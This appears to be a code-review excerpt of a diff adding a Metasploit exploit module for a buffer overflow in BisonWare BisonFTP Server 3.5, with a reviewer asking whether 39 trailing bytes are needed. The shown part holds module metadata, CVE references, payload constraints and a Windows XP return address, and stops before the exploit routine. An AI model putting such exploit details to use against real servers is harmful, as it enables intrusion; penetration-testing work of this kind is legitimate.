modules/exploits/windows/ftp/bison_ftp_bof.rb

```diff
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'			 => 'BisonWare BisonFTP Server Buffer Overflow',
+      'Description'	 => %q{
+        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.
+        This module exploits a buffer overflow vulnerability in the said
+        application.
+      },
+      'Platform'		 => 'win',
+      'Author'		 =>
+        [
+          'localh0t', # initial discovery
+          'veerendragg', # initial msf
+          'Jay Turla' # msf
+        ],
+      'License'		 => MSF_LICENSE,
+      'References'	 =>
+        [
+          [ 'CVE', '1999-1510'],
+          [ 'BID', '49109'],
+          [ 'EDB', '17649'],
+          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']
+        ],
+      'Privileged'	 => false,
+      'DefaultOptions' =>
+        {
+          'VERBOSE'  => true
+        },
+      'Payload'		 =>
+        {
+          'Space'          => 385,
+          'BadChars'       => "\x00\x0a\x0d",
+        },
+      'Targets'		=>
+        [
+          [ 'Bisonware FTP Server / Windows XP SP3 EN',
+            {
+              'Ret' => 0x0040333f,
```

Comment:
Interesting. So perhaps the 39 bytes at the end of the exploit aren't required then?